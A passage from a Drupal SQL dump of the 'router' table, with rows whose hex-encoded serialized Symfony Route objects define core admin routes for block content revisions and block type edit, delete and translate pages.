23b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130343a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5b5e2f5d2b2b292f7265766973696f6e2f283f503c626c6f636b5f636f6e74656e745f7265766973696f6e3e5b5e2f5d2b2b292f726576657274247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f726576657274223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a393a222f7265766973696f6e223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a32323a22626c6f636b5f636f6e74656e745f7265766973696f6e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3131373b733a31343a227061747465726e4f75746c696e65223b733a34303a222f61646d696e2f636f6e74656e742f626c6f636b2f252f7265766973696f6e2f252f726576657274223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.block_content.version_history', '/admin/content/block/{block_content}/revisions', '/admin/content/block/%/revisions', 29, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34363a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7265766973696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c56657273696f6e486973746f7279436f6e74726f6c6c6572223b733a363a225f7469746c65223b733a393a225265766973696f6e73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a33323a22626c6f636b5f636f6e74656e742e7669657720616c6c207265766973696f6e73223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36333a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5b5e2f5d2b2b292f7265766973696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7265766973696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32393b733a31343a227061747465726e4f75746c696e65223b733a33323a222f61646d696e2f636f6e74656e742f626c6f636b2f252f7265766973696f6e73223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.block_content_type.collection', '/admin/structure/block-content', '/admin/structure/block-content', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33303a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f6c697374223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a363a225f7469746c65223b733a31313a22426c6f636b207479706573223b733a31363a225f7469746c655f617267756d656e7473223b613a303a7b7d733a31343a225f7469746c655f636f6e74657874223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e697374657220626c6f636b207479706573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33303a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a33303a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e74223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.block_content_type.collection.bc', '/admin/structure/block/block-content/types', '/admin/structure/block/block-content/types', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f7479706573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e697374657220626c6f636b207479706573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35303a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f7479706573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f7479706573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a34323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f7479706573223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.block_content_type.config_translation_overview', '/admin/structure/block-content/manage/{block_content_type}/translate', '/admin/structure/block-content/manage/%/translate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36383a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38363a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34393a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.block_content_type.config_translation_overview.bc', '/admin/structure/block/block-content/manage/{block_content_type}/translate', '/admin/structure/block/block-content/manage/%/translate', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37343a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b733a393a22706c7567696e5f6964223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39323a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35353a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.block_content_type.delete_form', '/admin/structure/block-content/manage/{block_content_type}/delete', '/admin/structure/block-content/manage/%/delete', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36353a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32353a22626c6f636b5f636f6e74656e745f747970652e64656c657465223b733a31353a225f7469746c655f63616c6c6261636b223b733a36303a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a64656c6574655469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32353a22626c6f636b5f636f6e74656e745f747970652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38333a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34363a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.block_content_type.delete_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}/delete', '/admin/structure/block/block-content/manage/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31353a225f7469746c655f63616c6c6261636b223b733a36303a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a64656c6574655469746c65223b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32353a22626c6f636b5f636f6e74656e745f747970652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38393a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35323a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.block_content_type.edit_form', '/admin/structure/block-content/manage/{block_content_type}', '/admin/structure/block-content/manage/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35383a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32333a22626c6f636b5f636f6e74656e745f747970652e65646974223b733a31353a225f7469746c655f63616c6c6261636b223b733a35383a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a656469745469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32353a22626c6f636b5f636f6e74656e745f747970652e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37363a227b5e2f61646d696e2f7374727563747572652f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a33393a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.block_content_type.edit_form.bc', '/admin/structure/block/block-content/manage/{block_content_type}', '/admin/structure/block/block-content/manage/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36343a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a38313a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b436f6e74656e74547970655265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e697374657220626c6f636b207479706573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38323a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e742f6d616e6167652f283f503c626c6f636b5f636f6e74656e745f747970653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a34333a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e742f6d616e6167652f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
